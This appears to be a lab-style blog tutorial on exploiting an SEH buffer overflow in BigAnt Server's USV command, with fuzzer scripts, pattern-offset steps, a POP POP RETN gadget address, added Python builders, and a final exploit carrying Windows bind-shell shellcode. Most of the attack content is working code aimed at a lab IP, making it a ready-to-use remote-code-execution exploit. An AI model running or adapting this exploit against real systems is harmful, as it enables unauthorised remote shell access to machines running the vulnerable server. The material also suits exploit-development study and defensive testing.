
Friday, 17 February 2012

Exploit BigAnt Server

This server application, running on the local lab machine, listens on TCP port 6660. We will attack it through the USV command.






Make a fuzzer

#!/usr/bin/python
import socket

# USV verb, 2500 bytes of 'A', then the CRLF CRLF that terminates the command
buffer = b"USV " + b"\x41" * 2500 + b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101", 6660))
sock.send(buffer)
sock.close()

Run BigAnt Server and attach Ollydbg to it. Then send the 2500-byte buffer with the fuzzer and see what happens.


The application crashes, but EIP is not overwritten by the buffer we sent: the overflow raises an exception, and the application's SEH handling takes over. We can check this with View --> SEH chain, where the handler address of the current record has been overwritten by our buffer.



Press Shift+F9 to pass the exception to the program's handler. Because the handler address is overwritten, the value from our buffer is loaded into EIP; this is what lets us take control through the SEH record rather than through the saved return address.



Get POP POP RETN
We need the address of a POP POP RETN sequence to overwrite the SEH handler with, so we use View then Executable modules.



In Ollydbg click View --> Executable modules and double-click vbajet32.dll. In the CPU window for vbajet32.dll, right-click --> Search for --> Sequence of commands, fill in POP r32, POP r32, RETN and click Find. Ollydbg then gives the address of that sequence in vbajet32.dll. Pick the gadget from a module that is not compiled with SafeSEH and is not rebased at load time, and make sure the address contains no bad characters (null bytes in particular), otherwise the handler is never reached.
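The same search done programmatically, as an added example that is not part of the original post: it scans raw code bytes for POP r32; POP r32; RETN (or RETN imm16), skipping POP ESP, and checks that the resulting address is free of the bad characters assumed for this protocol. The sample bytes, the base address 0x0F9A1000 and the bad-character set are constructed for the example, not taken from vbajet32.dll.

```python
import struct

# opcode -> register for single-byte POP r32; 0x5c (pop esp) is left out because
# it moves the stack pointer and breaks the "pop pop ret" back into nSEH
POP_R32 = {0x58: "eax", 0x59: "ecx", 0x5a: "edx", 0x5b: "ebx",
           0x5d: "ebp", 0x5e: "esi", 0x5f: "edi"}

# constructed sample code bytes (hypothetical, not from vbajet32.dll)
SAMPLE_CODE = bytes(bytearray([
    0x90,                          # nop
    0x58, 0x5e, 0xc3,              # pop eax; pop esi; retn      <- usable
    0x90,                          # nop
    0x5c, 0x5d, 0xc3,              # pop esp; pop ebp; retn      <- skipped (pop esp)
    0x5b, 0x5d, 0xc2, 0x04, 0x00,  # pop ebx; pop ebp; retn 4    <- usable
]))


def find_pop_pop_ret(code, base_va):
    """Return [(virtual address, disassembly), ...] for every POP r32; POP r32; RETN
    (or RETN imm16) in `code`. `base_va` is the virtual address of code[0]: take it
    from the module's section header or from the debugger, not the file offset."""
    code = bytearray(code)
    gadgets = []
    for i in range(len(code) - 2):
        r1, r2 = POP_R32.get(code[i]), POP_R32.get(code[i + 1])
        if r1 is None or r2 is None:
            continue
        op = code[i + 2]
        if op == 0xC3:
            ret = "retn"
        elif op == 0xC2 and i + 4 < len(code):
            ret = "retn 0x%x" % struct.unpack_from("<H", bytes(code), i + 3)[0]
        else:
            continue
        gadgets.append((base_va + i, "pop %s; pop %s; %s" % (r1, r2, ret)))
    return gadgets


def address_is_clean(va, bad=b"\x00\x0a\x0d"):
    """True if the little-endian encoding of `va` contains none of `bad`
    (assumed bad characters: NUL and the CRLF that terminates the command)."""
    return not (set(bytearray(struct.pack("<I", va))) & set(bytearray(bad)))


if __name__ == "__main__":
    for va, disasm in find_pop_pop_ret(SAMPLE_CODE, 0x0F9A1000):
        print("0x%08x  %-26s clean=%s" % (va, disasm, address_is_clean(va)))
```

To use it on a real module, pass the bytes of its code section together with that section's virtual address; whether the module is SafeSEH-protected or rebased still has to be checked separately (for example with the module list in the debugger).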



Create the pattern offset
To find how many bytes it takes to reach the SEH record, we use pattern_create from Metasploit and load its output into the buffer in place of the 'A's.

root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2500 > Big.txt

#!/usr/bin/python
import socket

# body is the 2500-byte output of pattern_create.rb (Big.txt)
buffer = b"USV "
buffer += (b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2C"
           b"o3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D")
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101", 6660))
sock.send(buffer)
sock.close()

Restart Ollydbg and BigAnt Server and run the new fuzzer; press Shift+F9 to pass the exception. The SEH handler now holds 4 bytes of the pattern (0x42326742), and pattern_offset tells us where in the buffer those bytes are.



root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 42326742
966
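The same two steps in pure Python, as an added example that is not part of the original post: `pattern_create` reproduces the Metasploit cyclic pattern (upper letter, lower letter, digit) and `pattern_offset` finds where the 32-bit value seen in the debugger sits in it, so the 966 above can be reproduced without the framework. The function names are this example's own.

```python
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2 ... Zz9, cut to `length` bytes.
    The pattern is unique up to 26*26*10*3 = 20280 bytes."""
    out = ""
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += upper + lower + digit
                if len(out) >= length:
                    return out[:length]
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def pattern_offset(value, length=2500):
    """Offset of `value` inside the pattern of `length` bytes, or -1.

    `value` is either the 32-bit integer the debugger shows in the SEH handler
    or EIP (searched as little-endian bytes, i.e. the order they sat in memory)
    or the 4-character string read straight from the dump."""
    pattern = pattern_create(length)
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    else:
        needle = value
    return pattern.find(needle)


if __name__ == "__main__":
    # 0x42326742 is the handler value from the crash above
    print(pattern_offset(0x42326742))   # 966, matching pattern_offset.rb
```

The handler offset is 966, so the next-SEH pointer (nSEH), which precedes the handler in the record, starts at 962; the handler reads as "Bg2B" in the dump because 0x42326742 is stored little-endian.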

So 966 bytes of the body reach the SEH handler, and the next-SEH pointer sits 4 bytes earlier at offset 962. We put that layout into the fuzzer: 962 filler bytes, 4 bytes of \xcc for nSEH, then 4 bytes of \x41 for the handler.

#!/usr/bin/python
import socket

buffer = b"USV "
buffer += b"\x90" * 962          # filler up to the SEH record
buffer += b"\xcc\xcc\xcc\xcc"    # nSEH (next-SEH pointer)
buffer += b"\x41\x41\x41\x41"    # SEH handler
buffer += b"\x90" * (2504 - len(buffer))   # pad the body back to 2500 bytes
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101", 6660))
sock.send(buffer)
sock.close()

After that, restart Ollydbg and BigAnt Server and run the fuzzer. BigAnt Server crashes and the SEH handler is overwritten with our \x41 bytes (41414141), with the \xcc bytes in the nSEH field just before it.




Controlling execution
Now that we know the offset of the SEH record, we load the POP POP RETN address from vbajet32.dll into the fuzzer in place of the \x41 bytes. The address 0x0F9A196A is written little-endian, so it becomes \x6A\x19\x9A\x0F.

#!/usr/bin/python
import socket

buffer = b"USV "
buffer += b"\x90" * 962          # filler up to the SEH record
buffer += b"\xcc\xcc\xcc\xcc"    # nSEH
buffer += b"\x6A\x19\x9A\x0F"    # SEH handler = 0x0F9A196A, POP POP RETN in vbajet32.dll
buffer += b"\x90" * (2504 - len(buffer))
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101", 6660))
sock.send(buffer)
sock.close()

Before running BigAnt Server we set a breakpoint on the POP POP RETN address in vbajet32.dll, to make sure the exploit really lands where we expect; then we run the fuzzer.

Press Shift+F9 to pass the exception; execution stops at the breakpoint in vbajet32.dll. Step with F7 through the two POPs and the RETN: the RETN returns into our nSEH field on the stack.

Now we have a problem: the nSEH field gives us only 4 bytes of controlled space, which is not enough for shellcode, so we need to relocate to an address with more room. Right-click 015FFD7C, then Follow in Dump --> Selection, to see where the rest of our buffer lies: right after the handler address. A short jump in nSEH (\xeb\x06, jump 6 bytes forward over the two remaining nSEH bytes and the 4-byte handler) lands execution in that larger space.



Generating the shellcode
We will use msfweb:

root@bt:/pentest/exploits/framework2# ./msfweb
+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

then open it in the browser.


I will use a Windows bind shell to generate the shellcode.


Then we load the shellcode into the fuzzer, making sure it contains no bad characters: bytes the server mangles or that end the input early (null bytes and the \r\n that terminates this command are the usual suspects). We checked manually by sending the shellcode to the server a row at a time and comparing the stack dump with what was sent. Once the shellcode is free of bad characters, the final fuzzer looks like this:

#!/usr/bin/python
import socket

buffer = b"USV "
buffer += b"\x90" * 962          # filler up to the SEH record
buffer += b"\xeb\x06\x90\x90"    # nSEH: jmp short +6, over the handler address
buffer += b"\x6A\x19\x9A\x0F"    # SEH handler = 0x0F9A196A, POP POP RETN in vbajet32.dll
buffer += b"\x90" * 32           # NOP sled the short jump lands in
# msfweb windows bind shell, checked for bad characters
buffer += (b"\xdd\xc5\xb8\x4a\x27\x71\x35\x33\xc9\xb1\x51\xd9\x74\x24\xf4\x5e"
           b"\x83\xc6\x04\x31\x46\x13\x03\x0c\x34\x93\xc0\x6c\x50\xb8\x66\x64"
           b"\x5c\xc1\x86\x8b\xff\xb5\x15\x57\x24\x41\xa0\xab\xaf\x29\x2e\xab"
           b"\xae\x3e\xbb\x04\xa9\x4b\xe3\xba\xc8\xa0\x55\x31\xfe\xbd\x67\xab"
           b"\xce\x01\xfe\x9f\xb5\x42\x75\xd8\x74\x88\x7b\xe7\xb4\xe6\x70\xdc"
           b"\x6c\xdd\x50\x57\x68\x96\xfe\xb3\x73\x42\x66\x30\x7f\xdf\xec\x19"
           b"\x9c\xde\x19\xa6\xb0\x6b\x54\xc4\xec\x77\x06\xd7\xdc\x5c\xac\x5c"
           b"\x5d\x53\xa6\x22\x6e\x18\xc8\xbe\xc3\x95\x69\xb6\x45\xc2\xe7\x88"
           b"\x77\xfe\xa8\xeb\x5e\x98\x1b\x75\x37\x56\xae\x11\xb0\xeb\xfc\xbe"
           b"\x6a\xf3\xd1\x28\x58\xe6\x2e\x93\x0e\x06\x18\xbc\x27\x1d\xc3\xc3"
           b"\xd5\xd6\x0e\x96\x4f\xe5\xf1\xc8\xf8\x30\x04\x1d\x55\x95\xe8\x0b"
           b"\xf5\x49\x44\xe0\xa9\x2e\x39\x45\x1d\x4e\x6d\x2f\xc9\xa1\xd2\xc9"
           b"\x5a\x4b\x0b\x80\x35\xef\xd6\xda\x02\xb8\x19\xcc\xe7\x57\xb7\xa5"
           b"\x08\x87\x5f\xe1\x5a\x06\x49\xbe\x5b\x81\xda\x15\x5b\xfe\xb5\x70"
           b"\xea\x79\x0c\x2d\x12\x53\xdf\x85\xb8\x09\x1f\xf5\xd2\xda\x38\x8c"
           b"\x12\x63\x90\x91\x4d\xc1\xe1\xbd\x14\x80\x79\x5b\xb1\x37\xef\x2a"
           b"\xa4\xd2\xbf\x75\x0e\xef\xc9\x62\x3a\xab\x40\x8e\x8a\xf3\xa0\xe4"
           b"\x13\xb1\x6b\x06\xa9\x1a\xe7\x7b\x54\x5b\xac\x28\x02\xf3\xc0\xd0"
           b"\xe6\x12\xda\x59\x4d\xe4\xf2\xfa\x1a\x48\xaa\xad\xf5\x06\x4d\x1c"
           b"\xa7\x83\x1c\x61\x97\x44\x32\x44\x1d\x5b\x1f\x89\xc8\x09\x5f\x8a"
           b"\xc2\x32\x4f\xff\x7a\x31\xf3\x3b\xe0\x36\x22\x91\x16\x18\xa3\xe5"
           b"\x63\x9d\x6b\x56\x8b\x48\x6c\x88")
buffer += b"\x90" * (2504 - len(buffer))   # pad the body back to 2500 bytes
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101", 6660))
sock.send(buffer)
sock.close()
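The layout above, rebuilt as an added example that is not part of the original post: it computes the short jump from the record layout instead of hard-coding \xeb\x06, refuses handler addresses and shellcode that contain bad characters, provides the probe buffer used to find bad characters in the first place (send it where the shellcode will go and diff the stack dump against it), and reads the SEH record back out of the finished buffer so the layout can be checked before anything is sent. The bad-character set (NUL plus CR and LF) and the 10-byte int3 stand-in shellcode are assumptions for the example; the offsets, the 2504-byte body and the handler address are the ones used on this page.

```python
import socket
import struct

PREFIX = b"USV "              # the vulnerable command
NSEH_OFFSET = 962             # pattern_offset gave 966 for the handler; nSEH is 4 bytes earlier
TOTAL_LEN = 2504              # 4-byte verb + 2500-byte body, as in the fuzzers above
BAD_CHARS = b"\x00\x0a\x0d"   # assumption: NUL and the CRLF that terminates the command


def find_bad_chars(data, bad=BAD_CHARS):
    """Sorted list of the bytes from `bad` that occur in `data` (empty when clean)."""
    return sorted(set(bytearray(data)) & set(bytearray(bad)))


def bad_char_probe(exclude=BAD_CHARS):
    """Every byte 0x01..0xff except `exclude`. Send it in place of the shellcode and
    compare the stack dump with it; whatever is altered or cut off is a bad character."""
    skip = set(bytearray(exclude))
    return bytes(bytearray(b for b in range(1, 256) if b not in skip))


def short_jmp(skip):
    """EB rel8: jump `skip` bytes past the end of this 2-byte instruction."""
    if not 0 <= skip <= 127:
        raise ValueError("short jump out of range")
    return b"\xeb" + struct.pack("<b", skip)


def build_exploit(ppr_addr, shellcode, nop_sled=32, bad=BAD_CHARS):
    """filler | nSEH (jmp short + 2 pad bytes) | SEH (pop pop ret) | NOP sled | shellcode"""
    seh = struct.pack("<I", ppr_addr)
    for name, blob in (("handler address", seh), ("shellcode", shellcode)):
        found = find_bad_chars(blob, bad)
        if found:
            raise ValueError("%s contains bad bytes %s" % (name, [hex(b) for b in found]))
    # the jump occupies the first 2 bytes of nSEH; skip the 2 pad bytes and the 4-byte handler
    nseh = short_jmp(2 + len(seh)) + b"\x90\x90"
    body = b"\x90" * NSEH_OFFSET + nseh + seh + b"\x90" * nop_sled + shellcode
    if len(PREFIX) + len(body) > TOTAL_LEN:
        raise ValueError("payload does not fit in the %d-byte buffer" % TOTAL_LEN)
    body += b"\x90" * (TOTAL_LEN - len(PREFIX) - len(body))
    return PREFIX + body + b"\r\n\r\n"


def layout(buf):
    """Read the SEH record back out of a built buffer: nSEH bytes, handler value,
    and the body offset the short jump lands on."""
    base = len(PREFIX)
    nseh = buf[base + NSEH_OFFSET: base + NSEH_OFFSET + 4]
    seh = struct.unpack("<I", buf[base + NSEH_OFFSET + 4: base + NSEH_OFFSET + 8])[0]
    rel8 = struct.unpack("<b", nseh[1:2])[0]
    return {"nseh": nseh, "seh": seh, "jmp_target": NSEH_OFFSET + 2 + rel8}


def send_exploit(buf, host, port=6660):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    sock.send(buf)
    sock.close()


if __name__ == "__main__":
    # constructed stand-in for the bind shell: ten int3 instructions
    buf = build_exploit(0x0F9A196A, b"\xcc" * 10)
    print(layout(buf), len(buf))
    # send_exploit(buf, "192.168.56.101")   # uncomment against the lab target
```

With the page's handler address the record comes out as \xeb\x06\x90\x90 followed by \x6A\x19\x9A\x0F, and the jump lands at body offset 970, the first byte of the NOP sled, exactly as in the final fuzzer. Replace the int3 stand-in with the real bind shell; the bad-character check then runs against it automatically.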

Running the payload
Start BigAnt Server, then send the final fuzzer. After that, connect with telnet to the bind shell on the port chosen when the payload was generated.

